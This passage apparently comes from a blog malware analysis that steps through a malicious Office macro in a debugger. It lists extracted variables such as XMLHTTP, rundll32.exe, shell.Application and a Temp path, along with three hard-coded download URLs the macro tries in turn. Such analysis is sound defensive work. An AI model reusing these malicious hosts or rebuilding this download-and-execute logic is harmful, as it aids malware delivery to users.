<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s1600/3a.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="100" data-original-width="1600" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s640/3a.png" width="640" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s1600/3a.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s1600/3a.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmY_j_fIdDH2dqzsYSLymb05VftTCwAgoH5K0oHhU0_TgEJZCZ83kd4MkSt5xV_OQN5bSlzKwyxgY6R-yFkPUxwFtdlvxTzsHD9vxrTyGRT0LiBtiGKIl3gml9fasuWdJa4MmU1DGE3hG8/s1600/3a.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
And you can also see this in the properties window, under Status:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCmt3PwoiG7p_5q7AB7lY-ZWNKjVBp7L1GlT6du118gDEJob9x47yq7213zYqW60YRa29M_2xBHplunaGQBQx31Q-k9MUpEOQxlugz-gltz1AAZUJDTMfaQV8xpBuWheFQMGncyYiNOzrg/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="687" height="275" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCmt3PwoiG7p_5q7AB7lY-ZWNKjVBp7L1GlT6du118gDEJob9x47yq7213zYqW60YRa29M_2xBHplunaGQBQx31Q-k9MUpEOQxlugz-gltz1AAZUJDTMfaQV8xpBuWheFQMGncyYiNOzrg/s400/4.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->The variables extracted from the properties are then used as Array values for 'AlertN' ><!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1MUtkBBMIHpyLNs_8AByKtWnLjUcV_YC8kuR1191_y7Zs9B-OKLUGgznUKGFR8zsH5ajjutAMyxyS_2yHPHE1kW7h1hOmKMBPONylRSQY3wEPOmFi-QKU26_Ewlf_Bqhx-b5picdimRHO/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="735" data-original-width="907" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1MUtkBBMIHpyLNs_8AByKtWnLjUcV_YC8kuR1191_y7Zs9B-OKLUGgznUKGFR8zsH5ajjutAMyxyS_2yHPHE1kW7h1hOmKMBPONylRSQY3wEPOmFi-QKU26_Ewlf_Bqhx-b5picdimRHO/s400/5.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">C2H5OHName
: "<b>Microsoft.XMLHTTP</b>" : String : Asck.PropellersHead</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHeWcNg1ktNtl1p0o70J-WdU8l0lQTLlLdFdL0ePQoF_PCQQX-zunK0I1-4fCPrRy7rnuW_2HfbPwb1SyiVwPMUUAkqAAbZoG1tbHfJD-ZedrOO_VtA2DNLmN4mC9L6KhYBSDHT_6YKUSV/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="325" data-original-width="749" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHeWcNg1ktNtl1p0o70J-WdU8l0lQTLlLdFdL0ePQoF_PCQQX-zunK0I1-4fCPrRy7rnuW_2HfbPwb1SyiVwPMUUAkqAAbZoG1tbHfJD-ZedrOO_VtA2DNLmN4mC9L6KhYBSDHT_6YKUSV/s400/6.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Insert
BreakPoint ></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOTKTp0i8Ogr0grIfKBO-BcEfIc_hYAB1G7f1-jpwaTyUwbR-W4VSs9Gf-gUw1XafCqzWfPq-xxdCxYuI6YDhfHRmtJWpfbxtRDnq_3OoimZLaCKHEYTvepUb5reLSWimMxdyZR3Tl2d8/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="913" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAOTKTp0i8Ogr0grIfKBO-BcEfIc_hYAB1G7f1-jpwaTyUwbR-W4VSs9Gf-gUw1XafCqzWfPq-xxdCxYuI6YDhfHRmtJWpfbxtRDnq_3OoimZLaCKHEYTvepUb5reLSWimMxdyZR3Tl2d8/s400/7.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">CofeeShop
:</span><span style="font-size: 11pt;"> </span><span style="font-size: 11pt;">: Object/IServerXMLHTTPRequest2 :
Module2.C2H5OH</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTK0gVYuMp7CPA2lpKt51tm4ywQNrXsyQHftXZukyVo-YhT5PRVy9g28ZQubfShlMkSCI40Zdn4P2LagGtP6KeQQiLXZobrhcFEI4gyDa6-GCTdgJOeaemDt-sK5CHtqsjoAsl6gOZFc-J/s1600/8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="315" data-original-width="717" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTK0gVYuMp7CPA2lpKt51tm4ywQNrXsyQHftXZukyVo-YhT5PRVy9g28ZQubfShlMkSCI40Zdn4P2LagGtP6KeQQiLXZobrhcFEI4gyDa6-GCTdgJOeaemDt-sK5CHtqsjoAsl6gOZFc-J/s400/8.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
smbi :
"<span style="background: yellow; mso-highlight: yellow;">rundll32.exe</span>
" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
AlertN(2)
: "<span style="background: yellow; mso-highlight: yellow;">shell.Application</span>"
: String : Asck.PropellersHead</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRNcsl7aEF_hTJw01axJcLIkgXBwYZyQ5hmkSJofgpWGwJJSsf3DLYxm3S9qXlYoM0OttrG-0W6wT7X1nwd2IV-ON2p39hpNClNRPFNucpWiDQliZKPbRABNBH28kixQnmuk7tJQETXR4i/s1600/9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="295" data-original-width="1600" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRNcsl7aEF_hTJw01axJcLIkgXBwYZyQ5hmkSJofgpWGwJJSsf3DLYxm3S9qXlYoM0OttrG-0W6wT7X1nwd2IV-ON2p39hpNClNRPFNucpWiDQliZKPbRABNBH28kixQnmuk7tJQETXR4i/s400/9.png" width="400" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
<br />
<br />
<br />
<br />
<br />
BladeRunner_avatar
:<span style="mso-spacerun: yes;"> </span>: Object/IWshShell3 :
Module2.AnimTransferMap</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Shtefin has three URLs hard-coded, they will all be called in succession if the previous one fails. </div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">Shtefin :
"fondazioneprogenies.com/38rh76fCHASluxurious-ss.com/38rh76fCHASurban-dna.pt/38rh76f"
: Variant/String : Module2.AnimTransferMap</span><br />
<span style="font-size: 11pt;"><br /></span>
<span style="font-size: 11pt;">URLs from Stefan are passed into MarkusPils as array values:</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8i_7tmO4Gus02ERKzOmdAC0pXUjAgJXChyphenhyphen16DyA7okJs7908xYEy9KaJPEFT6EPgv5RdX_XuX2IRLSGqPWjMpOs7FrE8XU7UleMHDu76CZhTBNArYWz6bAPdPrUQ0YOKQgOubRlSlJJQ/s1600/10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" data-original-height="391" data-original-width="1015" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq8i_7tmO4Gus02ERKzOmdAC0pXUjAgJXChyphenhyphen16DyA7okJs7908xYEy9KaJPEFT6EPgv5RdX_XuX2IRLSGqPWjMpOs7FrE8XU7UleMHDu76CZhTBNArYWz6bAPdPrUQ0YOKQgOubRlSlJJQ/s400/10.png" width="400" /></a></div>
<br />
<div class="" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkhyphenhyphenofomunwpeBrTMy2gXyzxSQK81CseabpQhFbPifaiKjltFIUj9euLt7RlQjYMoae1-7TITHZkImd2jHFQok1B4eFTvWyo7_OcafI6JqPcZaNqAkhCe7W6GpYCLsebVeLH5y_xvrsUGb/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="337" data-original-width="1081" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkhyphenhyphenofomunwpeBrTMy2gXyzxSQK81CseabpQhFbPifaiKjltFIUj9euLt7RlQjYMoae1-7TITHZkImd2jHFQok1B4eFTvWyo7_OcafI6JqPcZaNqAkhCe7W6GpYCLsebVeLH5y_xvrsUGb/s400/11.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCx4OMtTJ4xavCA4YlknzrP0T1MkaJBuu5ZhwrqkzG3qUBOfl4udxPbLNjjku8qOY_uGEacn5OzOOWU_7IVpxUFPEIvmWjzPmL3YiZG5XHwPg7Du9U_2PBBpYe7iWqXKkioL86IbIvH7GL/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="791" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCx4OMtTJ4xavCA4YlknzrP0T1MkaJBuu5ZhwrqkzG3qUBOfl4udxPbLNjjku8qOY_uGEacn5OzOOWU_7IVpxUFPEIvmWjzPmL3YiZG5XHwPg7Du9U_2PBBpYe7iWqXKkioL86IbIvH7GL/s400/12.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=1270838152641758291" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Stocke :
6 : Integer : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<!--StartFragment-->
<!--EndFragment--></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
BladeRunner_FLAME
: "C:\Users\RAGNAR~1\AppData\Local\Temp" : String : Module2.C2H5OH</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFVth18B7ywJUi3xtlNhr3j4i-YakW1dPx4-Flf3ZcBRNBrGGxGJnu7GlVgO4D_VaqEfnbobSmIAYMh4PDeft2DS4LsEamSp71y44swdY4K2N6jYgmYvw5dfcPT6VnoYbR-9gTuHoUVrxn/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="137" data-original-width="903" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFVth18B7ywJUi3xtlNhr3j4i-YakW1dPx4-Flf3ZcBRNBrGGxGJnu7GlVgO4D_VaqEfnbobSmIAYMh4PDeft2DS4LsEamSp71y44swdY4K2N6jYgmYvw5dfcPT6VnoYbR-9gTuHoUVrxn/s320/13.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm_j30c3KdB2x2IwhbjbUIqfe0f3YMozpFwbUfs_UhF0DlGQAX_DZAd5uU9uzHHpc-UMEV-u5O_0iPgevaA3qhQ4MEvMhkowwX-0lWKDpEx0FyWNjYvoHbFjmRQksgH3TwGlU2dVxsC4-G/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="1159" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm_j30c3KdB2x2IwhbjbUIqfe0f3YMozpFwbUfs_UhF0DlGQAX_DZAd5uU9uzHHpc-UMEV-u5O_0iPgevaA3qhQ4MEvMhkowwX-0lWKDpEx0FyWNjYvoHbFjmRQksgH3TwGlU2dVxsC4-G/s320/14.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhymxft_I4S1XJdS7EhuZyZOv4RA4rBUhq17kl3NhiHZ1175wiAY2V5YMGupUPEidvik1rnXXulb8WtGhcCyFISo1Nd5wWcjhUKeqaPyumi2o88_ucfmj4VwtmHfzEnF4pLZh6ArvjEzTWH/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="153" data-original-width="1129" height="43" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhymxft_I4S1XJdS7EhuZyZOv4RA4rBUhq17kl3NhiHZ1175wiAY2V5YMGupUPEidvik1rnXXulb8WtGhcCyFISo1Nd5wWcjhUKeqaPyumi2o88_ucfmj4VwtmHfzEnF4pLZh6ArvjEzTWH/s320/15.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
LBound is 0 and UBound is 2 - which means that the URLs will be picked through a loop, 1 to 3:</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fkx-qocR1Tl2uzbprZXi0-SaP-cwOg7Oanc9RoBFt6fB8LfIjlLDDuYhjs0dlVCSrNUw6HO_Ptgb73SF_8n_CPd52SdpZY97X6EYq4kvNHtECWYb-4n0FFibir40XC0PDVxhNh2p1ERQ/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="275" data-original-width="643" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fkx-qocR1Tl2uzbprZXi0-SaP-cwOg7Oanc9RoBFt6fB8LfIjlLDDuYhjs0dlVCSrNUw6HO_Ptgb73SF_8n_CPd52SdpZY97X6EYq4kvNHtECWYb-4n0FFibir40XC0PDVxhNh2p1ERQ/s320/16.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
If the server gives anything other than a 200 response code, it'll through an error and move to the next URL. If not, that means the download was successful and it'll move on the next routine. </div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVtzklR-qo2WTMilDKMBdKJmAQX-lNIixKSkevJHO7Q-pjX47-ks9lHDOcleR1X103k9m7WVCvHqtqLk2Kf3KkP3GuzWHV1P1FzoQnCaIYuxCDnIo9XuGX2BF8lxwcEfLhcdmlha0stej/s1600/17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="195" data-original-width="917" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVtzklR-qo2WTMilDKMBdKJmAQX-lNIixKSkevJHO7Q-pjX47-ks9lHDOcleR1X103k9m7WVCvHqtqLk2Kf3KkP3GuzWHV1P1FzoQnCaIYuxCDnIo9XuGX2BF8lxwcEfLhcdmlha0stej/s320/17.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
